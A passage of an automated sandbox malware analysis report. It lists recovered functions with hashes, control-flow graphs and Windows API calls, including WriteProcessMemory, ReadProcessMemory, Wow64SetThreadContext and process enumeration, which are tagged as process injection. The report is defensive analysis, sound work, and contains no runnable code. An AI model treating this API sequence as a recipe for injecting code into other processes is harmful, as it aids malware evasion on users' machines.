                  • Instruction ID: ff2ea137a8ff38668bcf41282e5f56ed78bbc3904c6a7e68f4a74df5b6632c69
                  • Opcode Fuzzy Hash: 49d0a78d299d97b52c1e4773510e058984337e1478845ebd0edc5307a5d5db78
                  • Instruction Fuzzy Hash: 72317E715093806FE722CB65DC44FA2BFF8EF06324F09849EE9858B252D365E909CB71
                  Function 0069A98A Relevance: 1.6, APIs: 1, Instructions: 92registryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 849 69a98a-69aa15 853 69aa1a-69aa31 849->853 854 69aa17 849->854 856 69aa73-69aa78 853->856 857 69aa33-69aa46 RegOpenKeyExW 853->857 854->853 856->857 858 69aa48-69aa70 857->858 859 69aa7a-69aa7f 857->859 859->858
                  APIs
                  • RegOpenKeyExW.KERNELBASE(?,00000E24), ref: 0069AA39
                  Memory Dump Source
                  • Source File: 00000000.00000002.1590713706.000000000069A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0069A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_69a000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID: Open
                  • String ID:
                  • API String ID: 71445658-0
                  • Opcode ID: 29e80eed6cf2effd43db33bc434ad3309e45621c2eab3488c602dfbfee594d53
                  • Instruction ID: 9029e1dfb2eec09f33f9234baa9a6f4f67851f6a428898d7c2e616ebd3744cd3
                  • Opcode Fuzzy Hash: 29e80eed6cf2effd43db33bc434ad3309e45621c2eab3488c602dfbfee594d53
                  • Instruction Fuzzy Hash: 99318471508384AFE7228B61CC45FA7BFFCEF06610F09449AE9858B552D264E909CBB1
                  Function 0069AA81 Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 864 69aa81-69aaff 867 69ab01 864->867 868 69ab04-69ab0d 864->868 867->868 869 69ab0f 868->869 870 69ab12-69ab18 868->870 869->870 871 69ab1a 870->871 872 69ab1d-69ab34 870->872 871->872 874 69ab6b-69ab70 872->874 875 69ab36-69ab49 RegQueryValueExW 872->875 874->875 876 69ab4b-69ab68 875->876 877 69ab72-69ab77 875->877 877->876
                  APIs
                  • RegQueryValueExW.KERNELBASE(?,00000E24,140FD3B7,00000000,00000000,00000000,00000000), ref: 0069AB3C
                  Memory Dump Source
                  • Source File: 00000000.00000002.1590713706.000000000069A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0069A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_69a000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID: QueryValue
                  • String ID:
                  • API String ID: 3660427363-0
                  • Opcode ID: 50f07aa750eba339abe0d22d3fc8931b9fc728f69855a86ebcd1dfc3cbaf9fa2
                  • Instruction ID: 512835007115a30366fcf5a663fc944224ffdc1f3302cd4f7ce0725b79cd253a
                  • Opcode Fuzzy Hash: 50f07aa750eba339abe0d22d3fc8931b9fc728f69855a86ebcd1dfc3cbaf9fa2
                  • Instruction Fuzzy Hash: D631A4751097845FEB22CB61CC44FA2BFFCEF06714F08849AE945CB652D264E909CB65
                  Function 06751040 Relevance: 1.6, APIs: 1, Instructions: 86COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 881 6751040-67510cc 885 6751117-675111c 881->885 886 67510ce-67510ee TerminateProcess 881->886 885->886 889 67510f0-6751116 886->889 890 675111e-6751123 886->890 890->889
                  APIs
                  • TerminateProcess.KERNELBASE(?,00000E24,140FD3B7,00000000,00000000,00000000,00000000), ref: 067510D4
                  Memory Dump Source
                  • Source File: 00000000.00000002.1594321277.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6750000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID: ProcessTerminate
                  • String ID:
                  • API String ID: 560597551-0
                  • Opcode ID: ceaca2da482e4e2f0a85d9cca0b3ab253c2bfd05995b3902d715856a30594d65
                  • Instruction ID: 50a8c6dd8c26dcf35dce5cfec083f1fb020925d97cd85bec7a3a86c9623a2227
                  • Opcode Fuzzy Hash: ceaca2da482e4e2f0a85d9cca0b3ab253c2bfd05995b3902d715856a30594d65
                  • Instruction Fuzzy Hash: 2A2107755097806FE7128B61DC45BA6BFB8EF46324F0980DBE984CF193D264A909C771
                  Function 0675035E Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 893 675035e-67503b6 896 67503b8 893->896 897 67503bb-67503c7 893->897 896->897 898 67503cc-67503d5 897->898 899 67503c9 897->899 900 67503d7-67503df CreateFileW 898->900 901 6750426-675042b 898->901 899->898 903 67503e5-67503fb 900->903 901->900 904 675042d-6750432 903->904 905 67503fd-6750423 903->905 904->905
                  APIs
                  • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 067503DD
                  Memory Dump Source
                  • Source File: 00000000.00000002.1594321277.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6750000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: 6e5de9acf721bfd32c1fabb93c9ff34a65c647c116efd8aa8e00ecc5e2fe24f9
                  • Instruction ID: 359a4d8cb8afb52da9cea893266cc4a18e99a9c955ee4e7c1ae8e3d7a59030c9
                  • Opcode Fuzzy Hash: 6e5de9acf721bfd32c1fabb93c9ff34a65c647c116efd8aa8e00ecc5e2fe24f9
                  • Instruction Fuzzy Hash: 90216B71504600AFEB20CF65DD85FA6BBE8EF09724F0884AEEA458B651D3B5E404CA71
                  Function 0069A9BA Relevance: 1.6, APIs: 1, Instructions: 74registryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 908 69a9ba-69aa15 911 69aa1a-69aa31 908->911 912 69aa17 908->912 914 69aa73-69aa78 911->914 915 69aa33-69aa46 RegOpenKeyExW 911->915 912->911 914->915 916 69aa48-69aa70 915->916 917 69aa7a-69aa7f 915->917 917->916
                  APIs
                  • RegOpenKeyExW.KERNELBASE(?,00000E24), ref: 0069AA39
                  Memory Dump Source
                  • Source File: 00000000.00000002.1590713706.000000000069A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0069A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_69a000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID: Open
                  • String ID:
                  • API String ID: 71445658-0
                  • Opcode ID: 50e7bc9d038e86b6338f4536976b6eedbb8799be824223e4691e80a48d66afdf
                  • Instruction ID: 8b25d8b6c65576c4599fdabbbcc4e087a13eb2b02e9226e472c5e27460da4341
                  • Opcode Fuzzy Hash: 50e7bc9d038e86b6338f4536976b6eedbb8799be824223e4691e80a48d66afdf
                  • Instruction Fuzzy Hash: A1219D72504204AFFB209A51DD44FABFBECEF08724F04845AEA458B651D764E908CAB6
                  Function 067504EF Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 922 67504ef-675056d 926 67505a2-67505a7 922->926 927 675056f-6750582 GetFileType 922->927 926->927 928 6750584-67505a1 927->928 929 67505a9-67505ae 927->929 929->928
                  APIs
                  • GetFileType.KERNELBASE(?,00000E24,140FD3B7,00000000,00000000,00000000,00000000), ref: 06750575
                  Memory Dump Source
                  • Source File: 00000000.00000002.1594321277.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6750000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID: FileType
                  • String ID:
                  • API String ID: 3081899298-0
                  • Opcode ID: f67c2d3f9672b78542ddafe1c4aa4964a939eb1ed16cd84acd7e8c01951e6253
                  • Instruction ID: 8440f33e7d189cf8432e600eaf28f8861ff144a30aa25bdcecd3e1914660d043
                  • Opcode Fuzzy Hash: f67c2d3f9672b78542ddafe1c4aa4964a939eb1ed16cd84acd7e8c01951e6253
                  • Instruction Fuzzy Hash: 6321D2B54097846FE7228B11DC45FB2BFB8EF46724F0980DBE9848F193D268A909C775
                  Function 06750692 Relevance: 1.6, APIs: 1, Instructions: 70fileCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 933 6750692-6750709 937 675074d-6750752 933->937 938 675070b-675072b ReadFile 933->938 937->938 941 6750754-6750759 938->941 942 675072d-675074a 938->942 941->942
                  APIs
                  • ReadFile.KERNELBASE(?,00000E24,140FD3B7,00000000,00000000,00000000,00000000), ref: 06750711
                  Memory Dump Source
                  • Source File: 00000000.00000002.1594321277.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6750000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID: FileRead
                  • String ID:
                  • API String ID: 2738559852-0
                  • Opcode ID: 54e2bdf3e6082b9d4ed800e75a67eadbbbe00fa9fbe1f64bc0f22ac3c31782cf
                  • Instruction ID: 2cacdb0d6f58ea280d3693e59d4acb49784351a3a669646f53b39c3f035b652e
                  • Opcode Fuzzy Hash: 54e2bdf3e6082b9d4ed800e75a67eadbbbe00fa9fbe1f64bc0f22ac3c31782cf
                  • Instruction Fuzzy Hash: 4221CF71409380AFEB22CF51CC44FA7BFB8EF45320F08849AEA848B152C264A508CBB5
                  Function 0069AAC2 Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 945 69aac2-69aaff 947 69ab01 945->947 948 69ab04-69ab0d 945->948 947->948 949 69ab0f 948->949 950 69ab12-69ab18 948->950 949->950 951 69ab1a 950->951 952 69ab1d-69ab34 950->952 951->952 954 69ab6b-69ab70 952->954 955 69ab36-69ab49 RegQueryValueExW 952->955 954->955 956 69ab4b-69ab68 955->956 957 69ab72-69ab77 955->957 957->956
                  APIs
                  • RegQueryValueExW.KERNELBASE(?,00000E24,140FD3B7,00000000,00000000,00000000,00000000), ref: 0069AB3C
                  Memory Dump Source
                  • Source File: 00000000.00000002.1590713706.000000000069A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0069A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_69a000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID: QueryValue
                  • String ID:
                  • API String ID: 3660427363-0
                  • Opcode ID: 2c5d7e25a94b41b77635c1cd07b05ecf0dd5dbf44ab15f56431af763782ecd1a
                  • Instruction ID: d12e04169eddc0dbb0f256bf09d99870f4f0a2bb5ac913510980759167dc4b52
                  • Opcode Fuzzy Hash: 2c5d7e25a94b41b77635c1cd07b05ecf0dd5dbf44ab15f56431af763782ecd1a
                  • Instruction Fuzzy Hash: 7821CD75200604AFEB20CF51CC84FA7F7EDEF04724F0884AAEA45CB655D360E808CAB2
                  Function 0675107E Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 961 675107e-67510cc 964 6751117-675111c 961->964 965 67510ce-67510d6 TerminateProcess 961->965 964->965 967 67510dc-67510ee 965->967 968 67510f0-6751116 967->968 969 675111e-6751123 967->969 969->968
                  APIs
                  • TerminateProcess.KERNELBASE(?,00000E24,140FD3B7,00000000,00000000,00000000,00000000), ref: 067510D4
                  Memory Dump Source
                  • Source File: 00000000.00000002.1594321277.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6750000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID: ProcessTerminate
                  • String ID:
                  • API String ID: 560597551-0
                  • Opcode ID: 7ec3ba6f4e7d6af53a88692759d4045eaef4224be860d5f84ec9619bb623c217
                  • Instruction ID: b0430db39802e0d2337e89072e380e2dea9b72eb739053289b1c979306757c20
                  • Opcode Fuzzy Hash: 7ec3ba6f4e7d6af53a88692759d4045eaef4224be860d5f84ec9619bb623c217
                  • Instruction Fuzzy Hash: E811E375504244AFFB20CF55DC85BB6FBE8EF44624F0584AAEE05CF241D3B4A504CAB5
                  Function 067506B2 Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 972 67506b2-6750709 975 675074d-6750752 972->975 976 675070b-6750713 ReadFile 972->976 975->976 978 6750719-675072b 976->978 979 6750754-6750759 978->979 980 675072d-675074a 978->980 979->980
                  APIs
                  • ReadFile.KERNELBASE(?,00000E24,140FD3B7,00000000,00000000,00000000,00000000), ref: 06750711
                  Memory Dump Source
                  • Source File: 00000000.00000002.1594321277.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6750000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID: FileRead
                  • String ID:
                  • API String ID: 2738559852-0
                  • Opcode ID: 95ab6a8036f1a283a23228521f7d6aad60e28a112df7ffda877d0dc1e5bd2692
                  • Instruction ID: 274a63abf459b406e8682258317740acec3b40d76d629d79c7d28cbbcfc93664
                  • Opcode Fuzzy Hash: 95ab6a8036f1a283a23228521f7d6aad60e28a112df7ffda877d0dc1e5bd2692
                  • Instruction Fuzzy Hash: BB11BC75404604AFFB21CF51DC84FA6FBA8EF44724F0488AAEE458B251D375A5088FB6
                  Function 06750C72 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 983 6750c72-6750c99 984 6750c9e-6750ca4 983->984 985 6750c9b 983->985 986 6750ca6 984->986 987 6750ca9-6750cb2 984->987 985->984 986->987 988 6750cf5-6750cfa 987->988 989 6750cb4-6750cbc LookupPrivilegeValueW 987->989 988->989 991 6750cc2-6750cd4 989->991 992 6750cd6-6750cf2 991->992 993 6750cfc-6750d01 991->993 993->992
                  APIs
                  • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 06750CBA
                  Memory Dump Source
                  • Source File: 00000000.00000002.1594321277.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6750000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID: LookupPrivilegeValue
                  • String ID:
                  • API String ID: 3899507212-0
                  • Opcode ID: 8cac8f278e3c6d66f02cad8e3cda0180a503858c9e79427c3f721c81f0deec6d
                  • Instruction ID: c8d3adaa32e9d77cbfa72c24f4341e956c82ec52e8ffcb9d60bbe122ab2d1181
                  • Opcode Fuzzy Hash: 8cac8f278e3c6d66f02cad8e3cda0180a503858c9e79427c3f721c81f0deec6d
                  • Instruction Fuzzy Hash: 5B118271A042409FEB50CF19DC857A6FBE8EF05720F08C5AADD45CB251D775E404CA72
                  Function 06750522 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 995 6750522-675056d 998 67505a2-67505a7 995->998 999 675056f-6750582 GetFileType 995->999 998->999 1000 6750584-67505a1 999->1000 1001 67505a9-67505ae 999->1001 1001->1000
                  APIs
                  • GetFileType.KERNELBASE(?,00000E24,140FD3B7,00000000,00000000,00000000,00000000), ref: 06750575
                  Memory Dump Source
                  • Source File: 00000000.00000002.1594321277.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6750000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID: FileType
                  • String ID:
                  • API String ID: 3081899298-0
                  • Opcode ID: 29b552c77a9c7099ae421e2adc26b1a77e143d192da16f5cceed748d6be950fb
                  • Instruction ID: 2a67b1249642dd2f786ce67455c9d93ccd9a4fdc3871657b238d911327fe0a79
                  • Opcode Fuzzy Hash: 29b552c77a9c7099ae421e2adc26b1a77e143d192da16f5cceed748d6be950fb
                  • Instruction Fuzzy Hash: 6401D275904244AFF720CB05DC85FB6FBA8EF44724F05C09AEE458F241D7B4E5448AB6
                  Function 06750EC2 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1015 6750ec2-6750eec 1016 6750ef1-6750efa 1015->1016 1017 6750eee 1015->1017 1018 6750f3d-6750f42 1016->1018 1019 6750efc-6750f04 K32EnumProcesses 1016->1019 1017->1016 1018->1019 1020 6750f0a-6750f1c 1019->1020 1022 6750f44-6750f49 1020->1022 1023 6750f1e-6750f3a 1020->1023 1022->1023
                  APIs
                  • K32EnumProcesses.KERNEL32(?,?,?,140FD3B7,00000000,?,?,?,?,?,?,?,?,6D003C58), ref: 06750F02
                  Memory Dump Source
                  • Source File: 00000000.00000002.1594321277.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6750000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID: EnumProcesses
                  • String ID:
                  • API String ID: 84517404-0
                  • Opcode ID: c51ffdc3e1caf3c9d032adee188f521322b756355a9405fa1e428ab81d281fbf
                  • Instruction ID: f123fed95ae2ec94aa354d101a9170d05d89fb5aee742ad234289c7c81d51a1e
                  • Opcode Fuzzy Hash: c51ffdc3e1caf3c9d032adee188f521322b756355a9405fa1e428ab81d281fbf
                  • Instruction Fuzzy Hash: 3F116D759042449FEB50CF65D884BA6FBE4EF04720F09C4AAED49CB691D3B5E444CFA2
                  Function 067508FA Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                  Download Yara Rule
                  APIs
                  • SetFileAttributesW.KERNELBASE(?,?), ref: 06750937
                  Memory Dump Source
                  • Source File: 00000000.00000002.1594321277.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6750000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID: AttributesFile
                  • String ID:
                  • API String ID: 3188754299-0
                  • Opcode ID: a5dd89a0ed9e6b30c0f38da370f9948b28d2b0a6fd60f8f5c0fd2ceba09318bd
                  • Instruction ID: 20f5eb40f37a08c572a04a288fc18871afea97356531b9d46d15d28aee7a8b72
                  • Opcode Fuzzy Hash: a5dd89a0ed9e6b30c0f38da370f9948b28d2b0a6fd60f8f5c0fd2ceba09318bd
                  • Instruction Fuzzy Hash: 010180719042449FFB50CF25DC847A6FBE4EF45720F09C4AADD45CB656D3B5E404CAA2
                  Function 06750BB6 Relevance: 1.5, APIs: 1, Instructions: 47injectionCOMMON
                  Download Yara Rule
                  APIs
                  • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06750BFC
                  Memory Dump Source
                  • Source File: 00000000.00000002.1594321277.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6750000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID: MemoryProcessWrite
                  • String ID:
                  • API String ID: 3559483778-0
                  • Opcode ID: ee68a3339cd79406c966590aa49c17e021845c9881f11f75bc74386c15ba8eb7
                  • Instruction ID: 9ecd578f4fa91d6a24b2cdd3ba0196c258f8cbddaf54ee38bde569951afb9f9e
                  • Opcode Fuzzy Hash: ee68a3339cd79406c966590aa49c17e021845c9881f11f75bc74386c15ba8eb7
                  • Instruction Fuzzy Hash: F8018B755006049FEB20CF15D884BA6FBE4EF05324F08C0AADD458B661D3B1E858DBA2
                  Function 0069B122 Relevance: 1.5, APIs: 1, Instructions: 46libraryCOMMON
                  Download Yara Rule
                  APIs
                  • LoadLibraryShim.MSCOREE(?,?,?,?), ref: 0069B16D
                  Memory Dump Source
                  • Source File: 00000000.00000002.1590713706.000000000069A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0069A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_69a000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID: LibraryLoadShim
                  • String ID:
                  • API String ID: 1475914169-0
                  • Opcode ID: a1a8cc491aef96fcd6740274593d9fbef3bb8669b5e434930fdac2c09159dcff
                  • Instruction ID: 3fad04bfbcdd07d7b11e4b2c704b1a6fbebac4cf1a591aa5cfa5817c3ece6052
                  • Opcode Fuzzy Hash: a1a8cc491aef96fcd6740274593d9fbef3bb8669b5e434930fdac2c09159dcff
                  • Instruction Fuzzy Hash: 81018C715006409FEB20CE15ED84B62FBE8EF15720F08809ADD498BB52D374E808CA62
                  Function 0069BDA6 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                  Download Yara Rule
                  APIs
                  • GetFileVersionInfoW.KERNELBASE(?,?,?,?), ref: 0069BDE9
                  Memory Dump Source
                  • Source File: 00000000.00000002.1590713706.000000000069A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0069A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_69a000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID: FileInfoVersion
                  • String ID:
                  • API String ID: 2427832333-0
                  • Opcode ID: ed5ad3d1ec7d2c94ebb0d61afee78b264020d662469f590bf680d6e85e84a428
                  • Instruction ID: d65f557c1017f96ac4f7dbfc698ae171e4b5cc8963d9f14933972eeb0a52d3e0
                  • Opcode Fuzzy Hash: ed5ad3d1ec7d2c94ebb0d61afee78b264020d662469f590bf680d6e85e84a428
                  • Instruction Fuzzy Hash: A601D2715002009FEF208F16ED40BA6FBE8EF14720F0880AAEE458BB51D331E818CF62
                  Function 0069A4CE Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                  Download Yara Rule
                  APIs
                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0069A512
                  Memory Dump Source
                  • Source File: 00000000.00000002.1590713706.000000000069A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0069A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_69a000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID: DuplicateHandle
                  • String ID:
                  • API String ID: 3793708945-0
                  • Opcode ID: c6ef93c08eb8920f7b2df749badf5a7227b3cca90e46efeefdd2c46aa2882362
                  • Instruction ID: 9e16b4aed57658467cac316d08bf6b00e5500d52ff9d18e8103f8abab4761de6
                  • Opcode Fuzzy Hash: c6ef93c08eb8920f7b2df749badf5a7227b3cca90e46efeefdd2c46aa2882362
                  • Instruction Fuzzy Hash: 3F018B31504640AFEF208F95D844B52FBE5EF08724F0888AADE498BA51C336A424DFA2
                  Function 0069BCF6 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                  Download Yara Rule
                  APIs
                  • GetFileVersionInfoSizeW.KERNELBASE(?,?), ref: 0069BD33
                  Memory Dump Source
                  • Source File: 00000000.00000002.1590713706.000000000069A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0069A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_69a000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID: FileInfoSizeVersion
                  • String ID:
                  • API String ID: 1661704012-0
                  • Opcode ID: a9801b6110729de7b38fd69b38b211adb2fad5d29a7b022e4883dd5daa5e6e45
                  • Instruction ID: e7e655d817411ec9e802ded1a77931406ba25fea326fc46c17ea8e753ce1fd3f
                  • Opcode Fuzzy Hash: a9801b6110729de7b38fd69b38b211adb2fad5d29a7b022e4883dd5daa5e6e45
                  • Instruction Fuzzy Hash: B001B1719042449FEF20CF55E9847A2FBE8EF04720F0884AADD488B752D375E808CAA2
                  Function 06750A56 Relevance: 1.5, APIs: 1, Instructions: 44threadCOMMON
                  Download Yara Rule
                  APIs
                  • Wow64SetThreadContext.KERNEL32(?,?,140FD3B7,00000000,?,?,?,?,?,?,?,?,6D003C58), ref: 06750A93
                  Memory Dump Source
                  • Source File: 00000000.00000002.1594321277.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6750000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID: ContextThreadWow64
                  • String ID:
                  • API String ID: 983334009-0
                  • Opcode ID: 79ec7fc3c05e4564a7d0d9592c962a6e8ec5bb33bdeba630ded5fc79b7ae5f68
                  • Instruction ID: 3876f46283d6037f26521eaad65ed5dee73fd6a1ed66480f2cf35ea2e6228559
                  • Opcode Fuzzy Hash: 79ec7fc3c05e4564a7d0d9592c962a6e8ec5bb33bdeba630ded5fc79b7ae5f68
                  • Instruction Fuzzy Hash: 0801B1745042409FEB50CF15D885B66FBE4EF04324F09C0EADD058B752E3B4E844CBA2
                  Function 0069B84E Relevance: 1.5, APIs: 1, Instructions: 43libraryCOMMON
                  Download Yara Rule
                  APIs
                  • LoadLibraryW.KERNELBASE(?), ref: 0069B888
                  Memory Dump Source
                  • Source File: 00000000.00000002.1590713706.000000000069A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0069A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_69a000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID: LibraryLoad
                  • String ID:
                  • API String ID: 1029625771-0
                  • Opcode ID: 472c0ca9d39f4f7401f55be7bcfbe95771619c843f59413839333ed94ba68001
                  • Instruction ID: 71c7431e0150347e5619eda07912bc161ff29d0eee2e150b8a77dee87e221bc0
                  • Opcode Fuzzy Hash: 472c0ca9d39f4f7401f55be7bcfbe95771619c843f59413839333ed94ba68001
                  • Instruction Fuzzy Hash: 5A0171719042409FEB10CF55EA847A6FBECDF45724F08C4AADD098B742D375E404CBA2
                  Function 06750476 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                  Download Yara Rule
                  APIs
                  • FindCloseChangeNotification.KERNELBASE(?), ref: 067504A8
                  Memory Dump Source
                  • Source File: 00000000.00000002.1594321277.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6750000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID: ChangeCloseFindNotification
                  • String ID:
                  • API String ID: 2591292051-0
                  • Opcode ID: 48fa71126235a9f4a035f6a5ee4fe2b9cb76638a82f5b92a21ca79df7b5ff04f
                  • Instruction ID: 1dd8d5ce0506284d749013acb322173d68f040d0980881fee2189646eff30d71
                  • Opcode Fuzzy Hash: 48fa71126235a9f4a035f6a5ee4fe2b9cb76638a82f5b92a21ca79df7b5ff04f
                  • Instruction Fuzzy Hash: AD01DF709042409FEB50CF15D8847A6FBE4EF41320F08C4EEDD498F252D3B5A404CAA2
                  Function 06750032 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                  Download Yara Rule
                  APIs
                  • VerLanguageNameW.KERNELBASE(?,00000E24,?,?), ref: 06750082
                  Memory Dump Source
                  • Source File: 00000000.00000002.1594321277.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6750000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID: LanguageName
                  • String ID:
                  • API String ID: 2060303382-0
                  • Opcode ID: 23b3abae47209736625639b7d3776d0cf14f96bf1a77ffd66f3d5691522cc39f
                  • Instruction ID: 116fc948f5c92adb1a141f827c2bc67e17140c3033a7c7e494306f5754e1a8db
                  • Opcode Fuzzy Hash: 23b3abae47209736625639b7d3776d0cf14f96bf1a77ffd66f3d5691522cc39f
                  • Instruction Fuzzy Hash: 3901A271600200ABD350DF16CC86B26FBE8FB88A20F14811AED095B741D735F916CBE5
                  Function 067502B2 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                  Download Yara Rule
                  APIs
                  • FindCloseChangeNotification.KERNELBASE(?), ref: 067502E4
                  Memory Dump Source
                  • Source File: 00000000.00000002.1594321277.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6750000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID: ChangeCloseFindNotification
                  • String ID:
                  • API String ID: 2591292051-0
                  • Opcode ID: a7aa828a7daef58ff3ec4b3b63989ffceefec7be3be5c83bc25a0c67d148d79b
                  • Instruction ID: ab6915d8b897ec0a646cb1de512ae73e206efde3e9540a8f673a2ed6aea3a3c7
                  • Opcode Fuzzy Hash: a7aa828a7daef58ff3ec4b3b63989ffceefec7be3be5c83bc25a0c67d148d79b
                  • Instruction Fuzzy Hash: CD01DF719042409FEB50CF65D884BA6FBE4EF45720F08C0EEDD4A8B652D3B5E404CAB2
                  Function 06750B02 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                  Download Yara Rule
                  APIs
                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06750B40
                  Memory Dump Source
